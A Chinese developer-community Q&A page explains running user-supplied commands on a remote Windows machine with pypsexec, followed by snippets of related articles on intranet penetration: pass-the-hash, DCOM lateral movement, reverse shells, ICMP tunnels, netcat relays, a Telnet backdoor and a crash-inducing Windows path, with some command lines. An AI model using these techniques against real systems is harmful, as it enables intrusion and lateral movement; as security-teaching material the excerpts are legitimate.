开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

如何使用python pypsexec.client库在windows远程计算机上传递命令的动态输入

使用python pypsexec.client库在Windows远程计算机上传递命令的动态输入可以通过以下步骤实现：

安装pypsexec.client库：在命令行中执行pip install pypsexec命令来安装pypsexec.client库。
导入必要的模块：在Python脚本中导入所需的模块，包括pypsexec.client和getpass。

import pypsexec.client
import getpass

获取远程计算机的登录凭据：使用getpass模块获取远程计算机的用户名和密码。

username = input("请输入远程计算机的用户名：")
password = getpass.getpass("请输入远程计算机的密码：")

创建pypsexec.client对象并连接到远程计算机：使用pypsexec.client.Client类创建一个pypsexec.client对象，并使用connect方法连接到远程计算机。

client = pypsexec.client.Client(hostname, username=username, password=password)
client.connect()

其中，hostname是远程计算机的主机名或IP地址。

上传命令并执行：使用run_executable方法上传命令并在远程计算机上执行。

command = input("请输入要执行的命令：")
output = client.run_executable(command)
print(output)

断开与远程计算机的连接：使用disconnect方法断开与远程计算机的连接。

client.disconnect()

完整的代码示例：

import pypsexec.client
import getpass

username = input("请输入远程计算机的用户名：")
password = getpass.getpass("请输入远程计算机的密码：")
hostname = input("请输入远程计算机的主机名或IP地址：")

client = pypsexec.client.Client(hostname, username=username, password=password)
client.connect()

command = input("请输入要执行的命令：")
output = client.run_executable(command)
print(output)

client.disconnect()

这样，你就可以使用python pypsexec.client库在Windows远程计算机上传递命令的动态输入了。请注意，为了安全起见，建议在实际应用中使用加密的方式存储和传输密码，并采取适当的安全措施来保护远程计算机的访问权限。

相关搜索:如何使用PowerShell在远程计算机上安装Windows更新如何使用远程主机上的现有用户在该计算机上运行命令使用Fabric的run命令在远程计算机上运行python脚本时出错如何在Perl中使用UNIX命令？(在Windows计算机上使用)使用Python获取服务在远程计算机上运行的状态使用ansible传递远程主机的输入在本地运行python脚本如何将javascript形式的变量传递给python (在同一台计算机上)？在python 3 (Windows)中，在不按Enter键的情况下使用带超时的输入提示来计算输入如何使用命令CMD从Windows 7上的python django访问和配置postgresql数据库如何在windows命令提示符下使用python 3的加密库？简单地导入会产生错误使用python pyscopg2将值输入数据库时，在insert命令中提供%s的原因是什么如何设置我的web应用程序数据库以在另一台计算机上使用postgres数据库？

相关搜索:

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

如何设置 SSH 隧道(端口转发)

在本文中，我们将讨论如何设置本地，远程和动态加密的 SSH 隧道。...假设您在内部(专用)网络上的计算机 db001.host 上运行 MySQL 数据库服务器，在端口 3306 上可以从计算机访问，并且您希望使用本地计算机 pub001.host 上的 mysql 客户端连接到数据库服务器...动态端口转发动态端口转发允许您在充当 SOCKS 代理服务器的本地 (ssh 客户端)计算机上创建套接字。...当客户端连接到此端口时，连接将转发到远程 (ssh 服务器)计算机，然后将其转发到目标计算机上的动态端口。...在 Windows 中设置 SSH 隧道 Windows 用户可以使用 PuTTY SSH 客户端创建 SSH 隧道。你可以在这里下载 PuTTY 。

7.9K2 1

WindowsLinux文件下载方式汇总

我们可以在cmd中输入以下命令来查看certutil的具体使用方法： certutil -? ?...rundll32 Rundll32.exe功能是以命令行的方式调用动态链接程序库，系统中还有一个Rundll64.exe文件，它的意思是"执行64位的DLL文件"，其命令行下的使用方法为：Rundll32...当目标主机上安装了ncat是我们可以使用ncat来实现文件下载，当然这种场景在实战中少之又少~ 首先，我们在本地使用nc起一个监听，并传递我们想要传输的文件名称： nc -lvp 4444 < evil.sh...FTP ftp在linux一般都自带，我们可以在终端输入ftp进行交互，所以我们可以在本地搭建FTP服务，之后在目标主机上通过终端下的ftp进行远程连接来下载文件~ 首先，在攻击主机使用IPOP启动一个简易的...TFTP tftp在linux一般都自带，我们可以在终端输入tftp进行交互，所以我们可以在本地搭建TFTP服务，之后在目标主机上通过终端下的tftp远程下载文件~ 首先，在攻击主机使用IPOP启动一个简易的

2K5 0

内网渗透测试：内网横向移动基础总结

通过DCOM，客户端程序对象能够向网络中的另一台计算机上的服务器程序对象发送请求。下面通过一个实验来讲解如何使用DCOM在远程主机上面执行命令。...在使用该方法的条件如下：需要关闭目标系统的防火墙，如果目标主机DC没有关闭防火想的话会报错在远程主机上执行命令时，必须使用具有本地管理员权限的账号。...然后对DC执行远程命令（1）调用MMC20.Application远程执行命令建立ipc连接并上传木马后，在Windows7的powershell中输入如下命令，在远程系统中运行metasploit...（2）调用9BA05972-F6A8-11CF-A442-00A0C90A8F39 建立ipc连接并上传木马后，在Windows7的powershell中输入如下命令，在远程系统中运行metasploit...在域环境中，用户登录计算机时一般使用域账号，大量计算机在安装时会使用相同的本地管理员账号和密码，因此，如果计算机的本地管理员账号和密码也相同，攻击者就能使用哈希传递攻击的方法来登录内网中的其他主机。

3.5K1 0

内网渗透｜谈谈HASH传递那些世人皆知的事

由于在 Windows 系统 NTLM 认证的 TYPE 3 消息计算 Response 的时候，客户端是使用用户的 NTLM Hash 进行计算的，而不是用户密码进行计算的。...在域环境中，用户登录计算机时一般使用域账号，大量计算机在安装时会使用相同的本地管理员账号和密码，因此，如果计算机的本地管理员账号和密码也相同，攻击者就能使用哈希传递攻击的方法来登录内网中的其他主机。...Invoke-TheHash 脚本 Invoke-TheHash 脚本可以用来通过哈希传递在远程主机上执行 WMI 和 SMB 命令。...使用 Invoke-SMBClient 脚本该脚本支持SMB1，SMB2，SMB signing，如果只有 SMB 文件共享的权限而没有远程执行权限的话，可以使用这个脚本列举远程主机上的共享目录、上传或下载文件...其后果就是：无法通过本地管理员权限对远程计算机使用 Psexec、WMI、smbexec、IPC 等，也无法访问远程主机的文件共享等。

1.8K2 0

内网渗透之DCOM横向移动

利用这个接口，客户端程序对象能够向网络中另一台计算机上的服务器程序对象发送请求 COM提供了一套允许在同一台计算机上的客户端和服务器之间进行通信的接口(运行在Windows95及之后版本的操作系统中)。...DCOM是COM（组件对象模型）的扩展，它允许应用程序实例化和访问远程计算机上COM对象的属性和方法。...DCOM使用远程过程调用（RPC）技术将组件对象模型（COM）的功能扩展到本地计算机之外，因此，在远程系统上托管COM服务器端的软件（通常在DLL或exe中）可以通过RPC向客户端公开其方法攻击者在进行横向移动时...多了解一些横向移动方法，对日常的系统安全维护是大有益处的。使用DCOM进行横向移动的优势之一在于，在远程主机上执行的进程将会是托管COM服务器端的软件。...然后在执行命令前输proxychains python3 ./dcomexec.py [domain/]username:password@ip //创建一个交互式shell python3 .

2.3K2 0

如何安装，运行和连接到远程服务器上的Jupyter Notebook

在您的本地计算机上运行的现代Web浏览器，您将使用它来访问Jupyter Notebook。此外，如果您的本地计算机运行的是Windows，则需要在其上安装PuTTY才能建立到服务器的SSH隧道。...ssh是打开SSH连接的标准命令，但是当与-L指令一起使用时，您可以指定本地主机（即本地计算机）上的给定端口将转发到远程主机上的给定主机和端口（在这种情况下，您的服务器）。...这意味着在远程服务器上指定端口上运行的任何内容（Jupyter Notebook的默认端口8888）都将出现在本地计算机上的指定端口上（在示例命令中为8000）。...在Windows计算机上下载并安装PuTTY后（如前提条件教程中所述），打开程序并输入服务器URL或IP地址，如下所示：接下来，单击左窗格底部的+ SSH，然后单击隧道。...在此窗口中，输入要用于在本地计算机上访问Jupyter的端口（8000）。建议使用大于或等于8000的端口，因为这些端口号不太可能被其他进程使用。

16.6K11 8

Powershell

数据流：管道将前一个命令的输出传递给下一个命令的输入。对象传递：与传统的命令行不同，PowerShell管道传递的是对象而不是文本。这意味着可以在管道中处理复杂的数据结构。...在更改执行策略时，应考虑到脚本来源的安全性。 8.远程管理 PowerShell远程管理是通过网络执行命令和脚本的功能，通常用于管理远程计算机。...以下是一些关键概念和步骤：启用PowerShell远程启用WinRM（Windows远程管理）：在目标计算机上运行： Enable-PSRemoting -Force 配置信任主机（如果不在域中...ComputerName RemoteComputerName 执行命令：使用Invoke-Command在远程计算机上执行命令： Invoke-Command -Session $session...示例 # 建立远程会话 $session = New-PSSession -ComputerName Server01 # 在远程计算机上运行命令 Invoke-Command -Session $session

1131 0

通过SSHFS远程挂载文件夹，方便远程coding！

但是，有一种方法可以将VPS文件系统挂载到本地计算机上，这样您就可以动态地进行更改并将您的服务器的文件。在本文中，我们将向您展示如何做到这一点。...您需要从这里下载FUSE和SSHFS 在Windows上安装要在Windows中安装SSHFS，您需要从google代码存储库中获取最新的win-sshfs软件包。可以在下面找到下载链接。...系统会要求您输入在使用ssh-keygen创建密钥期间使用的密码。...使用Win-SSHFS在Windows上挂载远程文件系统启动win-sshfs程序后，您将看到一个界面，使安装远程文件共享的过程变得简单。步骤一：单击窗口左下角的“添加”按钮。...（请注意，在Windows上，您需要为密码登录配置服务器，而不能使用密钥）。步骤七：在“目录”字段中输入所需的安装点。（输入/从root用户安装文件系统。

26.9K6 0

内网渗透测试：利用DCOM进行横向渗透

利用这个接口，客户端程序对象能够向网络中另一台计算机上的服务器程序对象发送请求。 DCOM是COM（组件对象模型）的扩展，它允许应用程序实例化和访问远程计算机上COM对象的属性和方法。...使用DCOM进行横向移动的优势之一在于，在远程主机上执行的进程将会是托管COM服务器端的软件。...使用DCOM对远程主机执行命令下面通过几个实验来演示如何使用DCOM在远程主机上面执行命令。在使用该方法时，需要具有以下条件：具有管理员权限的PowerShell 可能需要关闭目标系统的防火墙。...在远程主机上执行命令时，必须使用域管的administrator账户或者目标主机具有管理员权限的账户（1）调用MMC20.Application远程执行命令测试环境如下：如图中，右侧是一个内网环境...然后控制Windows7对Windows Server 2008执行远程命令在Windows7的meterpreter中输入如下命令，加载powershell模块并进入powershell交互模式：

2.7K2 0

域内横向移动分析及防御

不能成功连接目标的139、445端口命令输入错误 2、Windows自带工具（1）dir 在使用net use命令与远程目标机器建立ipc$后，可以使用dir命令列出远程主机中的文件 dir \\...192.168.1.10\c$ （2）tasklist 在使用net use命令与远程目标机器建立ipc$后，可以使用tasklist命令列出远程主机上运行的进程 tasklist /S 192.168.1.10...将Administrator从Debug组中移除三、哈希传递攻击哈希传递PTH（Pass the Hash）攻击：在域环境中，用户登录计算机时使用的大都是域账号，大量计算机在安装时会使用相同的本地管理员账号和密码...说白了就是使用工具将散列值传递到其他计算机中，进行权限验证，实现对远程计算机的控制在实际测试中，更新KB287l997后无法使用常规的哈希传递方法进行横向移动，但Administrator账号（SID...工具包中的软件起初主要是用于大批量Windows主机的运维，在域环境下效果甚好通过PsExec，可以在远程计算机上执行命令，也可以将管理员权限提升到System权限以运行指定的程序可以在Windows

1.6K1 1

十五.Chrome密码保存功能渗透解析、Chrome蓝屏漏洞及音乐软件漏洞复现

第一步，在Win10谷歌浏览器（建议使用虚拟机测试）中输入命令。 \\.\globalroot\device\condrv\kernelconnect 第二步，我们的计算机就会自动蓝屏死机重启。.../ 该Windows 10中的错误是通过在浏览器的地址栏中打开特定路径或使用其他Windows命令，即可使操作系统崩溃并显示蓝屏死机。...第一个错误允许无特权的用户或程序输入单个命令，该命令会导致NTFS卷被标记为已损坏。该测试表明该命令导致硬盘驱动器损坏，从而导致Windows无法启动，本文不复现该漏洞。...更糟糕的是，特权低的Windows用户可以尝试使用此路径连接到设备，从而使计算机上执行的任何程序都很容易让Windows 10崩溃。...如果他们具有管理员权限，则可以远程执行访问网络上所有Windows 10设备上的此路径的命令，以使它们崩溃。在网络上造成的破坏可能会延迟调查或阻止管理控件检测到特定计算机上的攻击。

1.3K2 0

内网环境下的横向移动总结

而黑客窃取登陆凭证的方式主要包括：lsass内存读取、注册表读取、ntds 数据库读取等。在通过一系列手段窃取到登陆凭证后，黑客就能通过哈希传递、票据传递的方式登录目标主机。...它不仅能以system权限来运行指定应用程序，还能在本机生成命令提示符窗口，只要输入命令，就能在远程主机上执行并返回结果。...相比于Psexec，使用WMI执行远程命令基本不会在远程主机上留下日志，让黑客的行为显得更隐蔽。...administrator 输入如下命令，使用 wmiexec.vbs 在远程主机上执行单条命令 cscript.exe //nologo wmiexec.vbs /cmd...使用DCOM进行横向移动的优势之一在于，在远程主机上执行的进程将会是托管COM服务器端的软件。

3.6K2 0

如何在Ubuntu 16.04上设置Jupyter Notebook以运行IPython

在本教程的最后，您将能够使用在远程服务器上运行的Ipython和Jupyter Notebook来运行Python 2.7代码。...出于本教程的目的，使用Python 2（2.7.x），因为许多数据科学，科学计算和高性能计算库支持2.7而不是3.0+。...-L指定将本地（客户端）主机上的给定端口转发到远程端的给定主机和端口（CVM）。...这意味着在CVM上的第二个端口号（即8888）上运行的任何内容，都将显示在本地计算机上的第一个端口号（即8000）上。您应该更改8888为运行Jupyter Notebook的端口。...首先，输入服务器URL或IP地址作为主机名，如下所示：接下来，单击左窗格底部的SSH以展开菜单，然后单击 “Tunnels”。输入用于访问本地计算机上的Jupyter的本地端口号。

4K5 1

telnet 命令使用方法详解，telnet命令怎么用？

17)lcd 　　说明:更改本地计算机的本地目录,在默认的时候是启动ftp的目录.这个不要觉得没用啊，在你使用ftp的时候为了传递文件不是常改变本地和远程计算机的目录吗? 　　...解除NTLM的方法有很多，下面列出一些常用的方法，来看看入侵者如何去除NTLM验证。　　方法一：　　首先，在本地计算机上建立一个与远程主机上相同的账号和密码。　　...最后得到就是远程主机为Telnet终端用户打开的Shell，在该Shell中输入的命令将会直接在远程计算机上执行。　　比如，键入“net user”命令来查看远程主机上的用户列表。　　...它属于命令行工具，可以在本地对远程计算机上的服务进行查询、启动、停止和删除。它的用法很简单，这里不作介绍了。下面通过实例来介绍入侵者如何实现Telnet登录并留下Telnet后门的过程。　　...在安装服务之前，有必要了解一下Windows操作系统是如何提供“Telnet服务”的。打开“计算机管理”，然后查看“Telnet服务”属性。

74.3K4 4

Linux环境反弹shell原理与姿势

，那么在这种情况下我们就需要考虑——反弹shell，即攻击者在攻击主机上开启端口监听，随后让目标主机反向连接攻击者的服务器，从而规避防火墙、端口、权限等问题，本篇文章我们主要介绍Linux环境中如何通过命令执行来反弹...(stdin)从默认设备(通常是键盘)重定向到其他数据源(例如：文件或其他命令输出)的机制，它允许用户在命令行中使用文件作为输入，而无需手动输入数据，在Linux命令行中输入重定向通常使用"使用输入重定向将文件内容传递给cat命令，此时会将文件input.txt的内容输出到标准输出 cat < input.txt 输入重定向也可以与其他命令结合使用，例如：可以使用grep命令查找文件中的特定字符串...，这样设置之后受害者的Bash shell将会从攻击者的计算机接收输入(即执行命令) 此命令的整体功能是启动一个交互式Bash shell并将其连接到攻击者指定的IP地址和端口上，执行此命令后，受害者的计算机将主动建立一个...连接)中读取数据，也就是说cat将会从远程主机接收输入 3、| while read line; do ...; done |：管道符，将cat命令的输出传递给后面的命令 while read line

1101 0

Windows PowerShell 实战指南-动手实验-9.8

任务1：下面的命令是否可以获取特定域中所有计算机上已经安装的Hotfix的清单？...此参数不依赖于 Windows PowerShell 远程处理。即使你的计算机未配置为运行远程命令，你也可以使用 Get-Hotfix 的 ComputerName 参数。是否必需?...键入远程计算机的 NetBIOS 名称、Internet 协议 (IP) 地址或完全限定的域名。此参数不依赖于 Windows PowerShell 远程处理。...即使你的计算机未配置为运行远程命令，你也可以使用 Get-Hotfix 的 ComputerName 参数。是否必需? False 位置?...任务5：可以使用括号而不要使用管道输入方法来获取域中每一台计算机上已经安装的服务清单。

7771 0

内网渗透之哈希传递攻击

在域环境中，用户登录计算机时使用的大都是域账号，大量计算机在安装时会使用相同的本地管理员账号和密码，因此，如果计算机的本地管理员账号和密码也是相同的，攻击者就能使用哈希传递攻击的方法登录内网中的其他计算机...在Windows Server2012R2及之后版本的操作系统中，默认在内存中不会记录明文密码，因此，攻击者往往会使用工具将散列值传递到其他计算机中，进行权限验证，实现对远程计算机的控制。...当用户登录网站时，会先对用户输入的密码进行散列加密处理，再与数库中存储的散列值进行对比，如果完全相同则表示验证成功。...当此命令正确输入后就会弹出一个cmd ? 使用此cmddir一下与控制器的c盘 ?...使用AES密钥对远程主机进行哈希传递的前提是在本地安装KB2871997.

2.6K2 0

内网渗透基石篇--域内横向移动分析及防御

1 常用windows 远程连接和相关命令在渗透测试中，拿到目标计算机的用户明文密码或者NTLM hash后，可以通过pth的方法，将散列值或明文密码传送到目标机器中进行验证。...与目标机器建立连接后，可以使用相关方法在远程windows 操作系统中执行命令。在多层代理环境进行渗透测试时，由于网络条件比较差，无法使用图形化界面连接主机。...3 计划任务 1.at命令 at是windows自带的用于创建计划任务的命令，使用at命令可以在远程目标上创建计划任务，建立定时任务四部曲如下：使用net time 命令确定远程机器当前的系统时间使用...在域环境中，用户登录计算机时使用的大都是域账号，大量计算机在安装使用相同的本地管理员账户和密码，因此，如果计算机的本地管理员账号和密码也是相同的，攻击者就能使用哈希传递攻击的方法登录内网中的其他计算机。...方法二、防止以msf爆出神奇操作，以msf检测漏洞为标准的情况所以… ? 3 如何防范票据传递攻击 1,使用dir命令时，务必使用主机名。如果使用ip地址，就会导致错误。

2.9K6 2

黑客玩具入门——4、漏洞扫描与Metasploit

下面我们来看下如何使用这款工具：首先我们先登录Metasploitable2，通过ifconfig命令获取其IP地址。然后打开Legion工具。然后输入sudo legion启动工具。...它是专门用来收集各种漏洞的网站。在kali系统中，有搜索漏洞数据库的本地副本，我们可以在终端窗口中输入命令去搜索。...由于是python脚本所以我们使用python命令来执行，完整的命令是这样的：python /usr/share/exploitdb/exploits/windows/remote/39009.py xxx.xxx.xxx.xxx...1、运行程序 execute命令可以可以在目标系统中执行应用程序。该命令的使用方法如下： execute -f [Options] -H，创建一个隐藏进程。 -a，传递给命令的参数。...在开启远程桌面之前，我们还需要使用idletime命令检查远程用户的空闲时常，这样可以降低你被发现的概率。然后我们在新的终端执行：rdesktop [你的目标ip:3389]。

2.3K1 0

内网渗透测试研究：隐藏通讯隧道技术

在一些网络环境中，如果攻击者使用各类上层隧道（例如HTTP隧道、DNS隧道、常规端口转发等）进行的操作都失败了，由于防火墙不会屏蔽ping数据包，所以常常会通过ping命令访问远程主机，尝试建立ICMP...192.168.1.100 python icmpsh_m.py 攻击者ip 受害者ip 或输入..../run.sh运行程序，之后提醒你输入受害者公网ip，会给出你在受害者主机上执行的命令。...此时即可登录用远程桌面登录:4444，即可访问受害者的3389端口远程桌面了。 ? Linux系统上面使用portmap：先在具有公网ip的攻击机上执行： ....web服务器上面执行以下命令： nc 192.168.1.101 2333 -c "nc -v 192.168.52.143 3333" 最后在攻击机上面获得了数据库服务器的shell ?

2K6 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭